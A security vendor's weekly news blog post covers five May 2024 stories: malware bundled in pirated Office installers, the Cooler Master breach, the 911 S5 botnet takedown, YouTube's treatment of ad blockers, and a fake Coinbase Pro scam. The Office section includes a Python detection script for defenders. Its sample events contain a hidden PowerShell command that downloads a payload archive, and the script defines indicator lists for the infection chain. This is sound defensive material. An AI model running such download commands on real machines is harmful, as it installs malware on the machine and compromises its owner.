---
title: "Microsoft Office Malware, Cooler Master Breach, 911 Botnet Dismantled, Cybersecurity News [May 27, 2024] | DuoCircle"
description: "Microsoft Office Malware, Cooler Master Breach, 911 Botnet Dismantled, Cybersecurity News [May 27."
image: "https://www.duocircle.com/images/og-default.png"
canonical: "https://www.duocircle.com/blog/announcements/cyber-security-news-update-week-23-of-2024/"
---

Quick Answer

Five stories this week. Pirated Microsoft Office installers on torrent sites are bundling a mix of malware, including remote access trojans, cryptocurrency miners, and adware loaders. PC component maker Cooler Master confirmed a breach exposing customer records. The U.S. Department of Justice dismantled the 911 S5 botnet, which had infected 19 million IPs across 190+ countries, and arrested its administrator Yunhe Wang. YouTube users running ad blockers reported videos skipping to the end, an apparent escalation in Google's anti-ad-blocker enforcement. And Indian national Chirag Tomar was extradited and pled guilty to defrauding $37 million in cryptocurrency through a fake Coinbase Pro site.

Microsoft Office Malware, Cooler Master Breach, 911 Botnet Dismantled, Cybersecurity News \[May 27, 2024\]


![cyber security](https://media.mailhop.org/duocircle/images/2024/06/email-migration-service-2.jpg) 

Here we are again with the latest [cybersecurity](/) news from around the world, covering malware **posing as Microsoft Office** on torrent websites, the Cooler Master data breach, the takedown of the 911 S5 botnet, YouTube causing trouble for ad blocker users, and the arrest of an Indian man for creating a fake Coinbase website and stealing crypto. Stay tuned!

## Unauthorized Microsoft Office Installs Bring a Mix of Malware to Systems

Threat actors have been distributing [malware](/data-privacy/new-zero-click-hack-with-stealthy-root-privilege-malware-targets-ios-users/) via pirated versions of Microsoft Office on **torrent websites**.

_The malware is **extremely capable** and contains RATs (Remote Access Trojans), crypto miners, proxy tools, and much more_. The campaign was first noticed by AhnLab’s Security Intelligence Center, which [shared details](https://asec.ahnlab.com/en/66017/) about the threat actors using multiple lures for [Microsoft Office](/email-services/google-workspace-vs-microsoft-office-365-suite-which-is-the-right-choice-for-smes-in-2021/) and Windows OS.

The fake Microsoft Office installer has an interface mimicking the original and even lets you select the language and the bit variant of the OS. While the window is open, the **installer launches a .NET malware** that connects to a Telegram channel to receive download URLs (Uniform Resource Locators) pointing to Google Drive or GitHub. From there, PowerShell introduces [multiple malware strains](https://www.infosecurity-magazine.com/news/malware-service-top-threat/) to the victim’s system, which are **unpacked using 7Zip**.

The **campaign is ongoing** and is known for downloading [Orcus RAT](https://thehackernews.com/2023/01/3-lifehacks-while-analyzing-orcus-rat.html), XMRig, 3Proxy, PureCrypter, and [AntiAV malware](https://gbhackers.com/ra-world-ransomware/). Even if you discover and remove any of these, the updater will redownload it to your system upon launch.

It’s best to **stick to official channels** if you want to download files. If you do have to install files from other sources, make sure you trust the channel so that your [malware protection](/resources/sophos-alternatives) is not undermined, or avoid [pirated software](https://www.pcmag.com/news/new-mac-malware-spreads-through-pirated-software) altogether.
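For defenders, the chain described above (a non-browser process contacting Telegram, PowerShell pulling from Google Drive or GitHub, then 7-Zip unpacking) can be hunted by correlating stages within one process tree. The following is an added example, not code from this article or from AhnLab; the event fields, host lists and sample events are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Assumed indicator sets, chosen from the services named in the article.
TELEGRAM_HOSTS = {"t.me", "api.telegram.org"}
PAYLOAD_HOSTS = {"drive.google.com", "github.com", "raw.githubusercontent.com"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
SEVENZIP = {"7z.exe", "7za.exe", "7zr.exe"}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)

# Constructed events (process creation plus contacted hosts); not real telemetry.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Users\a\Downloads\OfficeSetup.exe", "cmd": "OfficeSetup.exe"},
    {"pid": 110, "ppid": 100, "image": r"C:\Users\a\AppData\Local\Temp\upd.exe", "cmd": "upd.exe", "dest": ["t.me"]},
    {"pid": 120, "ppid": 110, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -w hidden iwr https://drive.google.com/uc?id=EXAMPLE -OutFile p.7z"},
    {"pid": 130, "ppid": 120, "image": r"C:\Users\a\AppData\Local\Temp\7z.exe", "cmd": "7z.exe x p.7z"},
    # Benign look-alikes: each shows a single stage in its own process tree.
    {"pid": 200, "ppid": 1, "image": r"C:\Program Files\7-Zip\7z.exe", "cmd": "7z.exe x photos.7z"},
    {"pid": 300, "ppid": 1, "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "cmd": "pwsh -File build.ps1 https://github.com/example/repo"},
    {"pid": 400, "ppid": 1, "image": r"C:\Users\a\AppData\Roaming\Telegram Desktop\Telegram.exe",
     "cmd": "Telegram.exe", "dest": ["api.telegram.org"]},
]

def basename(path):
    """Lower-cased executable name from a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def stages_of(ev):
    """Return which stages of the described chain a single event exhibits."""
    found = set()
    exe = basename(ev["image"])
    if any(h.lower() in TELEGRAM_HOSTS for h in ev.get("dest", [])):
        found.add("telegram")
    if exe in POWERSHELL:
        hosts = {urlparse(u).hostname for u in URL_RE.findall(ev["cmd"])}
        if hosts & PAYLOAD_HOSTS:
            found.add("download")
    if exe in SEVENZIP and re.search(r"\s[xe]\s", ev["cmd"]):
        found.add("unpack")
    return found

def root_of(pid, by_pid):
    """Walk parent links to the oldest ancestor present in the event set."""
    seen = set()  # guards against loops caused by PID reuse in real logs
    while pid in by_pid and by_pid[pid]["ppid"] in by_pid and pid not in seen:
        seen.add(pid)
        pid = by_pid[pid]["ppid"]
    return pid

def correlate(events, min_stages=2):
    """Map root PID -> sorted stages, for trees showing several stages."""
    by_pid = {ev["pid"]: ev for ev in events}
    chains = defaultdict(set)
    for ev in events:
        chains[root_of(ev["pid"], by_pid)] |= stages_of(ev)
    return {root: sorted(s) for root, s in chains.items() if len(s) >= min_stages}

if __name__ == "__main__":
    for root, stages in correlate(EVENTS).items():
        print(f"root pid {root}: {', '.join(stages)}")
```

Any one stage alone is common on healthy machines, which is why the alert fires only when several stages share an ancestor.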

[![Malware Types](https://media.mailhop.org/duocircle/images/2024/06/365-to-365-migration.jpg)](https://media.mailhop.org/duocircle/images/2024/06/365-to-365-migration.jpg)

## Cooler Master Announces Data Breach, Customer Info Compromised

This week, the computer **hardware manufacturing** enterprise Cooler Master confirmed a [data breach](https://www.bbc.com/news/articles/c6ppv06e3n8o) that happened on 19 May 2024.

During the breach, a threat actor known as Ghostr [hacked into the organization’s website](https://techcrunch.com/2022/11/03/hundreds-news-websites-malware/) and made away with **linked databases**. The Cooler Master Fanzone website that was breached is used to register product warranties and open support tickets, and it needs the personal information of the customers.

The [threat actor](https://www.microsoft.com/en-us/security/blog/2024/05/28/moonstone-sleet-emerges-as-new-north-korean-threat-actor-with-new-bag-of-tricks/) says that they were able to steal 103GB of data, including information of nearly half a million customers. The potential **information that is at risk** includes names, emails, residential addresses, birth dates, and phone numbers of the customers. There are also other samples that include information about products, employees, emails with vendors, and partial **credit card data**.

The organization says it **promptly alerted** the authorities and has also hired security experts to address the situation. If you are an affected customer, Cooler Master will send you an email and [advise you](https://www.bleepingcomputer.com/news/security/cooler-master-confirms-customer-info-stolen-in-data-breach/) about the next steps you have to take to make sure that your data is safe.

The size of the data sample is substantial, so there’s a high chance that it **could be sold to other threat actors** in [dark web marketplaces](https://thehackernews.com/2023/06/over-100000-stolen-chatgpt-account.html). If you are a Cooler Master user, it’s best to keep an eye out for [phishing emails](https://www.cbsnews.com/news/russian-hackers-u-s-intelligence-community-spear-phishing-campaign/) and other [social engineering](/phishing-protection/social-engineering-is-a-growing-threat/) attacks.

## US Takes Down 911 S5 Botnet Used for Cyberattacks, Arrests Organizer

The U.S. Justice Department [took down and dismantled](https://www.scmagazine.com/news/feds-remove-ubiquiti-router-botnet-used-by-russian-intelligence) the 911 S5 proxy botnet with the help of international partners and has **arrested the portal’s administrator**.

_The FBI conducted a **joint cyber operation** to dismantle the world’s largest botnet ever and arrested its administrator, a Chinese national, Yunhe Wang._ They seized infrastructure and assets and levied sanctions. Wang and his co-conspirators have been pushing malware through multiple [malicious VPNs](https://thehackernews.com/2024/01/chinese-hackers-exploiting-critical-vpn.html) (Virtual Private Networks) **since 2011** and added all compromised devices to the 911 S5 residential proxy.

You can check if you are a victim of the malware [here](https://www.fbi.gov/investigate/cyber/how-to-identify-and-remove-vpn-applications-that-contain-911-s5-backdoors) and take the steps to get rid of it. Between 2014 and 2022, the threat actor created a **network of 19 million** unique IP addresses worldwide. The threat actors lured potential victims by offering free VPN services that installed the [proxy malware](https://www.geeksforgeeks.org/what-is-proxy-trojan/).

Now that it is finally dismantled, the Justice Department is serving **seizure warrants** for multiple domains that were used by the threat actor's network. Wang made a profit of $99 million by selling access to IP addresses to threat actors who [misused the networks for malicious purposes](https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/).

The U.S. Treasury Department arrested Wang (the boss), Jingping Liu (the money launderer), and Yanni Zheng (who had the power of attorney for Yunhe Wang), along with three organizations that were owned by Wang. Wang faces a maximum penalty of **65 years in prison** if convicted on all counts.

## Ad Blocker Users Report YouTube Videos Skipping to the End

Many people from **around the world** have been reporting that the YouTube videos they play while using an [ad blocker](https://www.theverge.com/2024/4/15/24131338/youtube-ad-blocker-crackdown-mobile-apps) skip straight to the end.

The issue began this week and is not impacting everyone at the moment, but it does affect all YouTube videos. _The behavior persists even if you reload the same video or click on the beginning of the video to watch it again_. You can only **fix this by getting rid of the ad blocker**.

The issue was [first reported](https://9to5google.com/2024/05/28/youtube-skipping-to-end-adblockers/) by **9to5Google**, and as it came to Google’s attention, they started cracking down on the use of ad blockers on YouTube. They have still not made it clear if the issue is an **intentional move** by them or an issue with third-party ad blocker applications. _However, YouTube recently announced that using ad blockers violates its terms of service, and it will soon start taking action against this._

People have found ways to fix it though! Some folks switched their ad blocker to one called [uBlock Origin](https://en.wikipedia.org/wiki/UBlock%5FOrigin), while others tried watching in **incognito mode** or signing out of YouTube. There’s also a web browser called [Brave](https://brave.com/) that seems to block ads without causing the videos to skip.

[![phishing protection](https://media.mailhop.org/duocircle/images/2024/06/email-smtp-service-6128.jpg)](https://media.mailhop.org/duocircle/images/2024/06/email-smtp-service-6128.jpg)

## Indian Man Defrauds $37 Million in Crypto Through Counterfeit Coinbase Pro Site

In other news, an Indian national pleaded guilty to a [wire fraud](https://www.cbsnews.com/colorado/news/former-colorado-data-company-executive-convicted-mail-wire-fraud/) conspiracy where he stole nearly $37 million via a fake Coinbase website that stole login credentials. This case **highlights the importance** of [phishing protection](/email/phishing-protection) to prevent such scams.

The man, Chirag Tomar, was [arrested at](https://www.justice.gov/usao-wdnc/pr/indian-national-pleads-guilty-wire-fraud-conspiracy-stealing-over-37-million-spoofing) the Atlanta airport in December last year and **was under investigation** by the U.S. Secret Service and the FBI. In 2021, Tomar and his accomplices made a fake Coinbase website that mimicked the Coinbase Pro portal, using the domain “Coinbasepro\[.\]com”.

The site tricked the customers of the official portal into entering their login details and **2FA codes**. The official Coinbase Pro portal was eventually shut down in November 2022, and all of its functionality was then integrated into the official Coinbase platform. Tomar also made [phishing Coinbase accounts](https://thehackernews.com/2024/01/inferno-malware-masqueraded-as-coinbase.html), **took control of crypto wallets**, and transferred funds into wallets that were under his control.

He also used social engineering tactics and leveraged a [fake login error](https://cybernews.com/security/facebook-users-targeted-copyright-infringement-scam/) that encouraged the users to call Coinbase representatives, who were also fake and duped the victims into **installing RATs** on their devices. The fraudster could go to prison for up to 20 years and be fined $250,000.


Brad Slavin 

General Manager

General Manager at DuoCircle. Product strategy and commercial lead across the email security portfolio.

